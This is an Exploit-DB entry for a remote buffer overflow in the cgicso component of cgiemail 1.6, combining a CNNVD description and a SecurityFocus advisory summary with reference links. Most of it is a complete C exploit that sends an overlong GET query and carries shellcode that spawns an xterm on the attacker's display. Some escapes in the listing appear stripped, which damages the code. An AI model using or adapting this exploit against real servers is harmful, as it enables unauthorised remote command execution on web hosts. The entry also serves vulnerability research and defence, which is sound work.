https://www.exploit-db.com/exploits/21998
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-873

CGIEmail是一款基于WEB的邮件处理系统。CGIEmail中的cgicso.c程序对用户提交的查询内容缺少正确的边界缓冲区检查，远程攻击者可以利用这个漏洞进行缓冲区溢出，可以以WEB权限执行任意指令。cgicso.c程序对query参数的内容缺少充分检查，攻击者提交超长的字符串作为query参数内容，可触发缓冲区溢出，精心构建提交的字符传可能以WEB进程的权限在系统上执行任意指令。

source: http://www.securityfocus.com/bid/6141/info

A vulnerability has been discovered in CGIEmail. It should be noted that this vulnerability exists only if the server allows queries to remote hosts.

A remotely exploitable buffer overflow has been discovered in a component included with CGIEmail. By sending a maliciously constructed GET request to the vulnerable server, it is possible for a remote attacker to overrun a buffer, potentially resulting in the execution of arbitrary system commands with the privileges of the mail server.

/*
 * cso.c (06/30/01)
 *
 * Remote exploit for cgicso included with cgiemail 1.6
 * Tested on Slackware Linux 7.1 running Apache 1.3.20
 * Spawns an xterm on your display.
 *
 *
 * Note: In order to exploit, cgicso must be compiled with
 * CGI_CSO_HARDCODE undefined, otherwise it will bypass
 * the exploitable portion of code.
 *
 *
 * Exploit By: isox of hhp. ([email protected])
 * Site: www.hhp-programming.net && 0xc0ffee.com
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

#define RET 0xbfffe208 // Slackware 7.1.0
#define LEN 2038
#define PORT 80

char noncode[] =
  "xebx4fx5ex31xd2x88x56x14x88x56x18x88x56x21xb2x2b"
  "x31xc9xb1x09x80x3cx32x4bx74x05x42xe2xf7xebx2bx88"
  "x34x32x31xd2x89xf3x89x76x36x8dx7ex15x89x7ex3ax8d"
  "x7ex19x89x7ex3ex8dx7ex22x89x7ex42x89x56x46x8dx4e"
  "x36x8dx56x46x31xc0xb0x0bxcdx80x31xdbx89xd8x40xcd"
  "x80xe8xacxffxffxff"
  "/usr/X11R6/bin/xterm8-ut8-display8127.0.0.1:0K";

char code[] =
  "%eb%4f%5e%31%d2%88%56%14%88%56%18%88%56%21%b2%2b%31%c9%b1%9%80%3c"
  "%32%4b%74%5%42%e2%f7%eb%2b%88%34%32%31%d2%89%f3%89%76%36%8d%7e%15"
  "%89%7e%3a%8d%7e%19%89%7e%3e%8d%7e%22%89%7e%42%89%56%46%8d%4e%36%8d"
  "%56%46%31%c0%b0%b%cd%80%31%db%89%d8%40%cd%80%e8%ac%ff%ff%ff%2f%75"
  "%73%72%2f%58%31%31%52%36%2f%62%69%6e%2f%78%74%65%72%6d%38%2d%75%74"
  "%38%2d%64%69%73%70%6c%61%79%38"
  "%31%32%37%2e%30%2e%30%2e%31" // unicoded IP address
  "%3a%30%4b";



int main(int argc, char *argv[]) {
  char *buf, *p;
  long *addressp, address=RET;
  int i, diff=(strlen(code) - strlen(noncode)), sock, debug=0;
  struct hostent *t;
  struct sockaddr_in s;


  if(argc < 2) {
    fprintf(stderr, "usage: %s <host> [offset [--debug]]n", argv[0]);
    exit(-1);
  }

  if(argc > 2)
    address -= atoi(argv[2]);

  if(argc > 3) {
    if((!strcmp(argv[3], "--debug")) || (!strcmp(argv[3], "-d")))
      debug = 1;
  }


  fprintf(stderr, "Using Address: 0x%lxn", address);

  buf = (char *)malloc(44 + LEN + diff + 1);
  p = buf;


  (*p++) = 'G';
  (*p++) = 'E';
  (*p++) = 'T';
  (*p++) = ' ';
  (*p++) = '/';
  (*p++) = 'c';
  (*p++) = 'g';
  (*p++) = 'i';
  (*p++) = '-';
  (*p++) = 'b';
  (*p++) = 'i';
  (*p++) = 'n';
  (*p++) = '/';
  (*p++) = 'c';
  (*p++) = 'g';
  (*p++) = 'i';
  (*p++) = 'c';
  (*p++) = 's';
  (*p++) = 'o';
  (*p++) = '?';
  (*p++) = 'f';
  (*p++) = 'i';
  (*p++) = 'n';
  (*p++) = 'g';
  (*p++) = 'e';
  (*p++) = 'r';
  (*p++) = 'h';
  (*p++) = 'o';
  (*p++) = 's';
  (*p++) = 't';
  (*p++) = '=';
  (*p++) = 'A'; // Yes this should be an A
  (*p++) = '&';
  (*p++) = 'q';
  (*p++) = 'u';
  (*p++) = 'e';
  (*p++) = 'r';
  (*p++) = 'y';
  (*p++) = '=';
  (*p++) = 'A'; // Yes this should be an A
  (*p++) = 'A'; // Yes this should be an A
  (*p++) = 'A'; // Yes this should be an A

  for(i=0; i<strlen(code); i++)
    (*p++) = code[i];

  addressp = (long *)p;

  for(i=0; i<(LEN - strlen(code)) + diff; i+=4)
    (*addressp++) = address;


  strcat(buf, "nn");
  fprintf(stderr, "Using length: %dn", strlen(buf));




/*
 * Connect
 */

  if(s.sin_addr.s_addr=inet_addr(argv[1])) {
    if(!(t=gethostbyname(argv[1]))) {
      printf("Connection Failed.n");
      exit(-1);
    }

    memcpy((char*)&s.sin_addr,(char*)t->h_addr,sizeof(s.sin_addr));
  }

  s.sin_family=AF_INET;
  s.sin_port=htons(PORT);

  sock=socket(AF_INET,SOCK_STREAM,0);


  if(connect(sock,(struct sockaddr*)&s,sizeof(s))) {
    fprintf(stderr, "Connection failed.n");
    exit(-1);
  }

  fprintf(stderr, "done.n");
  fprintf(stderr, "Sending buffer... ");
  send(sock, buf, strlen(buf), 0);
  fprintf(stderr, "done.n");

  sleep(2);

  if(debug == 1) {
    fprintf(stderr, "Entering Debug Mode... n");
    initstream(sock);
  }

  close(sock);
  free(buf);
  exit(0);
}



int initstream(int sock) {
  int n;
  char recvbuf[1024];
  fd_set rset;

  while (1) {
    FD_ZERO(&rset);
    FD_SET(sock,&rset);
    FD_SET(STDIN_FILENO,&rset);
    select(sock+1,&rset,NULL,NULL,NULL);

    if (FD_ISSET(sock,&rset)) {
      if((n=read(sock,recvbuf,1024)) <= 0) {
        printf("Connection closed by foreign host.n");
        exit(0);
      }

      recvbuf[n]=0;
      printf("%s",recvbuf);
    }

    if (FD_ISSET(STDIN_FILENO,&rset)) {
      if((n=read(STDIN_FILENO,recvbuf,1024)) > 0) {
        recvbuf[n]=0;
        write(sock,recvbuf,n);
      }
    }
  }

  return;
}

来源:US-CERTVulnerabilityNote:VU#185251
名称:VU#185251
链接:http://www.kb.cert.org/vuls/id/185251
来源:XF
名称:cgiemail-cgicso-get-bo(10595)
链接:http://xforce.iss.net/xforce/xfdb/10595
来源:BID
名称:6141
链接:http://www.securityfocus.com/bid/6141
来源:www.securiteam.com
链接:http://www.securiteam.com/exploits/5TP0W005FE.html
来源:SECTRACK
名称:1002395
链接:http://securitytracker.com/id?1002395
来源：NSFOCUS
名称：3812
链接：http://www.nsfocus.net/vulndb/3812